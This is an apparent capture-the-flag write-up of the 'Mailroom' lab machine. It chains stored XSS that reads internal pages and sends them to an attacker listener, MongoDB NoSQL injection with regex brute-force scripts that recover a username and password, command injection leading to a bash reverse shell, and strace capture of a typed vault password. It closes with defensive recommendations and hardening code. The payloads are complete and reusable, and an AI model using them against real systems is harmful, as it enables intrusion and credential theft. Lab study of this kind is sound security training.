Penetration Testing | Using XSS to Read Source Code
Word count: 865 | 2025-08-11 00:55:07
XSS Exploitation and Penetration Testing Walkthrough
1. Information Gathering
1.1 Initial Scan
Run a full-port scan with nmap:
```bash
nmap -p- --min-rate=1000 -T4 -sC -sV -Pn 10.10.11.209
```
1.2 Subdomain Discovery
- The usual directory scan turned up nothing, but a subdomain exists
- The hidden subdomain was found by reading the page source
- Key subdomain:
  staff-review-panel.mailroom.htb
2. XSS Exploitation
2.1 Basic XSS Check
```html
<script>alert('xss')</script>
```
2.2 Further Exploitation: Issuing Internal Requests with XMLHttpRequest
```html
<script>
// Runs in the browser of whoever views the stored message: fetches a page
// that is only reachable from the server's loopback interface and posts the
// status code and body to the listener at 10.10.16.5.
var fetch_req = new XMLHttpRequest();
fetch_req.onreadystatechange = function() {
  if(fetch_req.readyState == XMLHttpRequest.DONE) {
    var exfil_req = new XMLHttpRequest();
    exfil_req.open("POST", "http://10.10.16.5", false);
    exfil_req.send("Resp Code: " + fetch_req.status + "\nPage Source:\n" + fetch_req.response);
  }
};
fetch_req.open("GET", "http://127.0.0.1//contact.php", false);
fetch_req.send();
</script>
```
2.3 Loading an External JS File
Create pwned.js:
```javascript
// Reads index.php on the staff subdomain and sends the base64-encoded body
// back as a query string.
var http = new XMLHttpRequest();
http.open('GET', "http://staff-review-panel.mailroom.htb/index.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
  fetch("http://10.10.16.5/out?" + encodeURI(btoa(this.responseText)));
};
http.send(null);
```
Example request in Burp Suite:
```http
POST /contact.php HTTP/1.1
Host: mailroom.htb
Content-Length: 82
Content-Type: application/x-www-form-urlencoded

email=1%401.com&title=1&message=<script src="http://10.10.16.5/pwned.js"></script>
```
3. Code Audit and Vulnerability Analysis
3.1 Key Vulnerabilities in auth.php
- MongoDB NoSQL injection
- 2FA token generation and verification logic
3.2 Command Injection in inspect.php
```php
// The (insufficiently) sanitised inquiry_id is interpolated straight into a shell command.
$inquiryId = preg_replace($_POST['inquiry_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");
```
4. NoSQL Injection
4.1 Basic Authentication Bypass
```javascript
// Both fields are sent as bracket-notation arrays, which the server decodes
// into {"$ne": ...} operator objects and passes to the MongoDB query.
var http = new XMLHttpRequest();
http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
  fetch("http://10.10.16.5/out?" + encodeURI(btoa(this.responseText)));
};
http.send("email[$ne]=someb0dy@sm.com&password[$ne]=someb0dy");
```
4.2 Username Enumeration Script
```javascript
// Builds the local part of the address one character at a time from the right:
// a $regex match that returns "success":true reports the candidate and recurses.
async function callAuth(mail) {
  var http = new XMLHttpRequest();
  http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
  http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  http.onload = function () {
    if (/"success":true/.test(this.responseText)) {
      notify(mail);
      cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!", mail);
    }
  };
  http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {
  fetch("http://10.10.16.5/out?" + mail);
}
var chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!";
function cal(chars, mail) {
  for (var i = 0; i < chars.length; i++) {
    callAuth(chars[i] + mail)
  }
}
cal(chars, "");
```
4.3 Password Brute-force Script
```javascript
// Same technique as 4.2, but the known email is fixed and the password is
// extended one character at a time from the left using an anchored $regex.
async function callAuth(pass) {
  var http = new XMLHttpRequest();
  http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
  http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  http.onload = function () {
    if (/"success":true/.test(this.responseText)) {
      notify(pass);
      cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!", pass);
    }
  };
  http.send("email=tristan@mailroom.htb&password[$regex]=^"+pass);
}
function notify(pass) {
  fetch("http://10.10.16.5/out?" + pass);
}
var chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!";
function cal(chars, pass) {
  for (var i = 0; i < chars.length; i++) {
    callAuth(pass+chars[i])
  }
}
cal(chars, "");
```
5. Privilege Escalation
5.1 2FA Bypass
- The 2FA verification link was found in a local file: /etc/mail/tristan contains the verification link
5.2 RCE via Command Injection
Create a reverse shell script:
```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.5/5555 0>&1
```
5.3 Decrypting the kdbx File
- Found the file personal.kdbx
- Opened it with the kpcli tool
- Captured the password as it was typed, using strace:
```bash
strace -p [PID] -e trace=read
```
Recovered password: `!sEcUr3p4\[w0rd9`
6. Root Cause Analysis
6.1 Cause of the XSS
- The user-supplied `message` parameter is written to the page without filtering
- The front-end template `inquiry_template.html` renders user input directly
6.2 Summary of the Full Attack Chain
1. Information gathering reveals the subdomain
2. XSS is used to read source code
3. Code audit reveals the NoSQL injection point
4. NoSQL injection yields SSH credentials
5. 2FA verification is bypassed
6. Command injection gives RCE
7. Sensitive information leads to the second user's credentials
8. The kdbx file is decrypted
9. Root access is obtained
7. Defensive Recommendations
1. Strictly filter and escape all user input
2. Deploy a Content Security Policy (CSP) to limit the impact of XSS
3. Use parameterised queries to prevent NoSQL injection
4. Never build system commands by concatenating user input
5. Harden the 2FA flow so verification links are not left in local files
6. Store sensitive files encrypted; never keep passwords in plaintext
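To make recommendations 3 and 4 concrete for the auth.php and inspect.php findings above, here is an added example (not code from the writeup or from the target application) showing why `email[$ne]=...` reaches MongoDB as an operator and how a type-checked handler stops it. `parseForm`, `vulnerableFilter`, `hardenedFilter` and `safeInquiryPath` are hypothetical helpers; the Mongo filter is only built, never executed.

```javascript
// parseForm mimics how PHP (and the `qs` package) turn bracket keys such as
// email[$ne] into nested objects: {email: {"$ne": "..."}}.
function parseForm(body) {
  const out = {};
  for (const pair of body.split("&")) {
    const [rawKey, rawVal = ""] = pair.split("=");
    const key = decodeURIComponent(rawKey.replace(/\+/g, " "));
    const val = decodeURIComponent(rawVal.replace(/\+/g, " "));
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/); // one level of brackets is enough here
    if (m) {
      if (typeof out[m[1]] !== "object" || out[m[1]] === null) out[m[1]] = {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Vulnerable pattern: whatever the form parser produced is passed to find()
// unchanged, so an object value becomes a query operator.
function vulnerableFilter(form) {
  return { email: form.email, password: form.password };
}

// Hardened: each credential must be a plain string that matches an allow-list.
// Returns null (reject the request) for anything else. In real code the stored
// password hash is verified after the lookup, not matched inside the query.
const EMAIL_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;
function hardenedFilter(form) {
  const { email, password } = form;
  if (typeof email !== "string" || typeof password !== "string") return null;
  if (!EMAIL_RE.test(email) || password.length === 0 || password.length > 256) return null;
  return { email: email, password: password };
}

// Same idea for the inspect.php path: only a strict identifier may reach the
// filesystem path, and the file should then be read with fs APIs, not a shell.
function safeInquiryPath(inquiryId) {
  if (typeof inquiryId !== "string" || !/^[A-Za-z0-9]{1,64}$/.test(inquiryId)) return null;
  return "/var/www/mailroom/inquiries/" + inquiryId + ".html";
}
```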